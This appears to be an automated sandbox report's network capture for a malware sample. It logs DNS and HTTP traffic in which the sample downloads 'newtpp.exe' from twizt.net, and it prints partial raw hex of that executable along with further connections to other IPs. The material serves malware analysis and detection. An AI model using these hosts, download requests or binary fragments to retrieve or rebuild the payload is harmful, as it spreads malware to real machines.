                                                                  Nov 28, 2024 18:18:44.489104033 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489128113 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489190102 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489758968 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489820957 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489831924 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489856005 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489926100 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.490613937 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.490719080 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.490750074 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.490778923 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:45.689966917 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:45.742775917 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:45.935275078 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:45.977127075 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.073962927 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.194897890 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.194986105 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.319936991 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.918927908 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.961509943 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.121893883 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.165039062 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.169020891 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.289783955 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.289840937 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.301914930 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.305294991 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.410151005 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.421857119 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:47.421993971 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.424236059 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:47.425565958 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.425626040 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.544152975 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794306993 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794363976 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794377089 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794430017 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794452906 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794460058 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794464111 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794504881 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794518948 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794523954 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794529915 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794550896 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794595957 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.794764996 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794778109 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.794856071 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.922482014 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.922509909 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.922605038 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.934115887 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.934139967 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:48.934355974 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:48.934355974 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.008101940 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.008119106 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.008191109 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.008191109 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.012269020 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.012383938 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.012392044 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.012523890 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.020704985 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.020785093 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.020816088 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.020929098 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.029068947 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.029144049 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.029181004 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.029469013 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.037477016 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.037548065 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.037590981 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.037723064 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.045871019 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.045953989 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.046010971 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.046073914 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.054285049 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.054404020 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.054414988 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.054452896 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.062719107 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.062792063 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.062793016 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.062992096 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.070971966 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.071057081 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.071147919 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.071147919 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.079114914 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.079240084 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.079327106 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.087373018 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.087594986 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.087604046 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.088234901 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.095649958 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.095751047 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.096005917 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.096103907 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.215747118 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.215821028 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.215856075 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.215897083 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.218252897 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.218310118 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.219188929 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.219250917 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.219283104 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.219325066 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.224451065 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.224539995 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.224560022 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.224785089 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.229489088 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.229542971 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.229571104 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.229691029 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.234407902 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.234466076 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.234468937 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.234555006 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.239273071 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.239404917 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.239434958 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.239456892 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.244282007 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.244338989 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.244349003 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.244385004 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.249164104 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.249217033 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.249232054 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.249449015 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.254055977 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.254122972 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.254167080 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.254220009 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.259033918 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.259047031 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.259107113 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.263964891 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.264018059 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.264044046 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.264086008 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.268857956 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.268917084 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.268922091 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.268964052 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.273796082 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.273825884 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.273876905 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.278737068 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.278804064 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.278806925 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.278850079 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.283755064 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.283809900 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.283884048 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.284092903 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.288631916 CET804971191.202.233.141192.168.2.10
                                                                  Nov 28, 2024 18:18:49.288789988 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:49.572470903 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:49.572807074 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:49.692874908 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:49.692898989 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:49.693000078 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:49.693013906 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:49.693259001 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:49.813415051 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034643888 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034708977 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034725904 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034739017 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034775019 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034776926 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034795046 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034800053 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034807920 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034821033 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034826040 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034832954 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034852028 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034869909 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.034974098 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.034989119 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.035000086 CET8049712185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:51.035016060 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.035037994 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.035054922 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.036237001 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:51.036271095 CET4971280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:52.041155100 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:52.161154032 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:52.161250114 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:52.161539078 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:52.281478882 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:52.306791067 CET4971440500192.168.2.10217.30.162.161
                                                                  Nov 28, 2024 18:18:52.426814079 CET4050049714217.30.162.161192.168.2.10
                                                                  Nov 28, 2024 18:18:52.427095890 CET4971440500192.168.2.10217.30.162.161
                                                                  Nov 28, 2024 18:18:52.428695917 CET4971440500192.168.2.10217.30.162.161
                                                                  Nov 28, 2024 18:18:52.548590899 CET4050049714217.30.162.161192.168.2.10
                                                                  Nov 28, 2024 18:18:52.548738956 CET4971440500192.168.2.10217.30.162.161
                                                                  Nov 28, 2024 18:18:52.670025110 CET4050049714217.30.162.161192.168.2.10
                                                                  Nov 28, 2024 18:18:53.558790922 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.558813095 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.558979988 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.560559034 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.560581923 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.560594082 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.560625076 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.560655117 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.562635899 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.562689066 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.562700033 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.562715054 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.562761068 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.565061092 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.565097094 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.565131903 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.565164089 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.681180000 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.681206942 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.681294918 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.761763096 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.761801004 CET8049713185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:53.761837959 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:53.761861086 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:55.328363895 CET4971180192.168.2.1091.202.233.141
                                                                  Nov 28, 2024 18:18:55.328452110 CET4971380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:55.328483105 CET4971440500192.168.2.10217.30.162.161

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 28, 2024 18:18:28.772816896 CET5553153192.168.2.101.1.1.1
                                                                  Nov 28, 2024 18:18:29.087652922 CET53555311.1.1.1192.168.2.10
                                                                  Nov 28, 2024 18:18:43.482512951 CET5529340500192.168.2.1090.156.160.6
                                                                  Nov 28, 2024 18:18:48.533042908 CET5529340500192.168.2.1080.191.218.209

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 28, 2024 18:18:28.772816896 CET192.168.2.101.1.1.10xf7c6Standard query (0)twizt.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 28, 2024 18:18:29.087652922 CET1.1.1.1192.168.2.100xf7c6No error (0)twizt.net185.215.113.66A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • twizt.net
                                                                  • 185.215.113.66
                                                                  • 91.202.233.141

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.1049702185.215.113.66808140C:\Users\user\Desktop\LM94OE0VNK.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 28, 2024 18:18:29.216578007 CET174OUTGET /newtpp.exe HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                  Host: twizt.net
                                                                  Nov 28, 2024 18:18:30.566354036 CET1236INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Thu, 28 Nov 2024 17:18:30 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 80896
                                                                  Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
                                                                  Connection: keep-alive
                                                                  ETag: "6733d71b-13c00"
                                                                  Accept-Ranges: bytes
                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PEL3gdu@p$.text `.rdata34@@.data(/@ @
                                                                  Nov 28, 2024 18:18:30.566548109 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                  Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j UGfO
                                                                  Nov 28, 2024 18:18:30.568135977 CET1236INData Raw: 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 45 c4 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b 10 83 c2 04 3b d1 77 58 83 7d 0c 00
                                                                  Data Ascii: fNU Vu EL$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$$A
                                                                  Nov 28, 2024 18:18:30.568157911 CET1236INData Raw: 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11 40 00 6a 00 6a 00 89 5e 0c ff 15 a0
                                                                  Data Ascii: $D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFAFFT$FWRPy~;uF;vu]F[Ft;r+F][+n][W|$/
                                                                  Nov 28, 2024 18:18:30.568171978 CET248INData Raw: 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00 00 e8 e6 fd ff ff 56 ff 15 f8 00 41
                                                                  Data Ascii: =4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA.+r`tP`uC PA4AD$CjP`A_^[]S
                                                                  Nov 28, 2024 18:18:30.569247961 CET1236INData Raw: 00 55 8b 6c 24 0c 8b 8d 60 02 00 00 57 6a 00 56 6a 00 8d 44 24 1c 50 6a 01 8d 7e 1c 57 51 c7 44 24 2c 00 00 00 00 ff d3 85 c0 74 3e ff 15 58 02 41 00 3d e5 03 00 00 74 31 3d 33 27 00 00 75 30 6a 01 ff 15 38 01 41 00 8b 85 60 02 00 00 6a 00 56 6a
                                                                  Data Ascii: Ul$`WjVjD$Pj~WQD$,t>XA=t1=3'u0j8A`jVjT$RjWPD$,u_][_]2[SW|$2?ilci8uUl$Vj<L$D$ UQF0Fnn$WF F,uV
                                                                  Nov 28, 2024 18:18:30.569271088 CET1236INData Raw: 15 58 02 41 00 8b f0 8b 5c 24 18 8b 44 24 14 8b 4c 24 10 56 e8 8d fd ff ff 83 c4 04 6a ff 8d 4c 24 18 51 8b 4f 08 8d 54 24 18 52 8d 44 24 24 33 f6 50 51 89 74 24 2c 89 74 24 24 89 74 24 28 ff d5 8b 4c 24 10 85 c0 0f 95 c0 3b ce 75 8b 5b 5f 5e 5d
                                                                  Data Ascii: XA\$D$L$VjL$QOT$RD$$3PQt$,t$$t$(L$;u[_^]8VjLe}rD$PPCOI(AL$,F PVAjjjjAF)jjjjAFFjjjjjj
                                                                  Nov 28, 2024 18:18:30.569281101 CET248INData Raw: fc 8b 51 08 52 8b 45 fc 8b 08 51 e8 d2 12 00 00 83 c4 08 8b 55 fc 8b 02 50 e8 04 7d 00 00 83 c4 04 8b 4d fc c7 41 08 00 00 00 00 8b 55 fc c7 42 04 00 00 00 00 8b 45 08 8b 08 51 e8 e2 7c 00 00 83 c4 04 8b 55 08 c7 02 00 00 00 00 8b e5 5d c3 cc cc
                                                                  Data Ascii: QREQUP}MAUBEQ|U]UEEMQURAEPMQUREQ'EUREQBUBE]UEM;Hs=UUEEMU;QsEUE
                                                                  Nov 28, 2024 18:18:30.570137978 CET1236INData Raw: 04 33 c0 e9 c7 00 00 00 8b 55 08 8b 42 08 3b 45 0c 0f 83 89 00 00 00 8b 4d 08 8b 51 08 89 55 f4 8b 45 0c c1 e0 02 50 e8 ee 79 00 00 83 c4 04 89 45 f0 8b 4d 08 8b 11 89 55 f8 83 7d f0 00 75 1c 8b 45 f4 50 8b 4d f8 51 e8 9d 11 00 00 83 c4 08 8b 55
